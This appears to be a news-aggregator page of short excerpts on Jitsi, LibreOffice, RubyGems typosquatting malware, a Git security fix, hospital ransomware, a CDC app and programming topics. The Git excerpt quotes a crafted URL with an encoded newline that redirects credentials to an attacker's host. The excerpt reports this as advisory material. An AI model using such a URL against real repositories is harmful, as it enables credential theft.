Want to Ditch Zoom? Jitsi Offers an Open-Source Alternative
-
As we spend more time on videoconferences, concerns mount about trust. Emil Ivov says you shouldn't have to trust anyone.
-
Thanks to the sponsorship of VFOSSA (Vietnam Free Open Source Software Association), CoMeet Alliance has officially launched the "made in Vietnam" consulting, design, integration, support and maintenance video conference (online meeting) solutions on open source platform Jitsi in April 2020.
[Tutorial] LibreOffice Calc Reference to Another External Sheet or Workbook
When you are working with multiple workbooks or worksheets, it is often needed to refer back or retrieve data from different workbooks into the current workbook. This helps to keep your work modular and less complex. In LibreOffice Calc, you can achieve it using an external reference.
Security and Proprietary Issues
-
A cybersecurity firm discovered that over 700 libraries of the popular programming language, Ruby, contained malicious Bitcoin-stealing software.
ReversingLabs, based in Cambridge, Massachusetts, disclosed its findings in a blog post on Thursday. Back in February, it wrote, hackers placed malicious files inside a package manager called RubyGems—which is usually used to upload and share improvements on existing pieces of software.
The hackers were trying to trick developers into downloading malware by using a method called “typosquatting”, which consists of uploading malicious packages with similar names to regular ones. By just changing a few characters of a file name, the hope was that a developer would mistakenly download an infected package—unwittingly providing the hacker with access to their system.
-
Git released an update on Tuesday, fixing an issue that could result in leaking credentials. The vulnerability was in how Git handles an HTTP URL containing a newline. Looking at the commits in 2.26.1, we can find an example of an attack:
url = "https://one.example.com?%0ahost=two.example.com/foo.git"
So doing a git pull against this repository will connect your git instance to an attacker’s server, but using the credentials from an arbitrary server. It seems like this could potentially be used to steal Github credentials, for instance. So go make sure you have an updated Git client.
-
The Chinese e-commerce giant plans to build more datacenters to complement an existing network covering 21 regions around the world, the company said in a statement. It will continue to develop its own technologies in areas such as AI-inference chips to support that expansion in cloud services, it added.
-
As hospitals face a surge in patients and critical equipment shortages stemming from the coronavirus pandemic, they are increasingly becoming the target of [attackers] who see health care facilities as easy prey.
Ransomware attacks, in which [attackers] lock up a network and demand payment to return access to these systems, have presented a growing threat to hospitals since January.
Experts are warning that they expect these attacks to increase and that the threat has captured the attention of top intelligence lawmakers, who warn the outbreak and the ransomware attacks create the perfect storm.
-
The Centers for Disease Control and Prevention (CDC) plans to roll out an app in May that will accelerate electronic case reporting of COVID-19 cases.
The app, based on Fast Healthcare Interoperability Resources (FHIR) standards, can be implemented quickly to automate COVID case reporting, said Laura Conn, health scientist and eCR lead in the CDC's Center for Surveillance, Epidemiology, and Laboratory Services.
The app enables healthcare providers that don't have the capability to automatically send case reports from their health IT systems to more efficiently send data to public health agencies.
-
Rogers clarified that the government’s use of confidential declarations convinced her that unearthing the exact number of national security letters dating back to 2014, as requested by Twitter, would put national security at risk.
Programming and Open Hardware Leftovers
-
Before I say anything about my contributions, I would like to share my sweet encounter with Raku. Last week while working on the task Flip Binary using Raku, I was struggling to figure out all the binary strings with maximum 1s. I had the results in a Hash where key was the binary string and value was the total count of 1s in it. The idea was to sort the Hash by values first then sort by keys. After posting the question on the Twitter handle @PerlWChallenge, I received the below solution by PawgChamp (@Mrofnet).
-
Back in early 2018, the prrd package was introduced as release 0.0.1, uploaded to CRAN, and updated once as release 0.0.2. I have used it extensively for every CRAN release of Rcpp, RcppArmadillo, RcppEigen, BH, and possibly others.
-
Modern web application development is incomplete without learning jQuery. Almost all of us have heard of it at some point while browsing the Internet. In this series of articles, we will learn jQuery, the most popular Javascript framework. At the end of the series, we will build multiple projects to better understand jQuery.
In this article, we will talk about what jQuery is. How it works. Why prefer jQuery over Javascript.
Before we move on to discussing how to install jQuery and other advanced topics, let us talk about some basics of jQuery such as, what is jQuery?
-
Last month, I received Qoitech Otii Arc power supply, power meter, and DAQ unit that aims at helping hardware and software engineers develop energy-efficient products.
I’ve now had time to test the unit with an ESP8266 board and Raspberry Pi 4 SBC, so I’ll show how to get started and my overall experience with the hardware and program.
-
When you start out with Arduino, you have a vast selection of choices. This may be confusing. To make it easier, start by thinking what you want your first project should do for you. The different packages have more or less components. Motors and servos, sensors and LEDs are usually included but not always.
Arduino is many boards, based on micro controllers from ATmega. Since Arduino is open source, there are also many other manufacturers that do the same. The best way to start is to use a starter kit with the UNO v3 board. There are many others, but this one is easy to get started with and cheap.
Recent comments
58 min 29 sec ago
3 hours 53 min ago
4 hours 2 min ago
4 hours 15 min ago
4 hours 18 min ago
4 hours 58 min ago
15 hours 57 min ago
22 hours 29 min ago
22 hours 44 min ago
22 hours 44 min ago